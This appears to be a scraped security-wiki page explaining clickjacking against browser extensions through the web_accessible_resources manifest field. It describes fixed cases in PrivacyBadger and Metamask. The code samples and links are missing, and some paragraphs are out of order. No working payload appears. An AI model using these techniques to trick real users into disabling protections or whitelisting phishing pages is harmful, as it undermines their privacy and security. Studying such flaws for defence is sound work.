BrowExt - ClickJacking
Last updated
Last updated
Reading time: 4 minutes
This page is going to abuse a ClickJacking vulnerability in a Browser extension. If you don't know what ClickJacking is check:
Extensions contains the file manifest.json and that JSON file has a field web_accessible_resources. Here's what say about it:
These resources would then be available in a webpage via the URL
chrome-extension://[PACKAGE ID]/[PATH], which can be generated with theextension.getURL method. Allowlisted resources are served with appropriate CORS headers, so they're available via mechanisms like XHR.
The web_accessible_resources in a browser extension are not just accessible via the web; they also operate with the extension's inherent privileges. This means they have the capability to:
Change the extension's state
Load additional resources
Interact with the browser to a certain extent
However, this feature presents a security risk. If a resource within web_accessible_resources has any significant functionality, an attacker could potentially embed this resource into an external web page. Unsuspecting users visiting this page might inadvertently activate this embedded resource. Such activation could lead to unintended consequences, depending on the permissions and capabilities of the extension's resources.
In the extension PrivacyBadger, a vulnerability was identified related to the skin/ directory being declared as web_accessible_resources in the following manner (Check the original ):
json
To address this vulnerability, a straightforward solution was implemented: the removal of /skin/* from the list of web_accessible_resources. This change effectively mitigated the risk by ensuring that the content of the skin/ directory could not be accessed or manipulated through web-accessible resources.
The fix was easy: remove /skin/* from the web_accessible_resources.
html
Another ClickJacking fixed in the Metamask extension was that users were able to Click to whitelist when a page was suspicious of being phishing because of “web_accessible_resources”: [“inpage.js”, “phishing.html”]. As that page was vulnerable to Clickjacking, an attacker could abuse it showing something normal to make the victim click to whitelist it without noticing, and then going back to the phishing page which will be whitelisted.
Check the following page to check how a XSS in a browser extension was chained with a ClickJacking vulnerability:
This configuration led to a potential security issue. Specifically, the skin/popup.html file, which is rendered upon interaction with the PrivacyBadger icon in the browser, could be embedded within an iframe. This embedding could be exploited to deceive users into inadvertently clicking on "Disable PrivacyBadger for this Website". Such an action would compromise the user's privacy by disabling the PrivacyBadger protection and potentially subjecting the user to increased tracking. A visual demonstration of this exploit can be viewed in a ClickJacking video example provided at .
A . In this case, Metamask fixed the vulnerability by checking that the protocol used to access it was https: or http: (not chrome: for example):
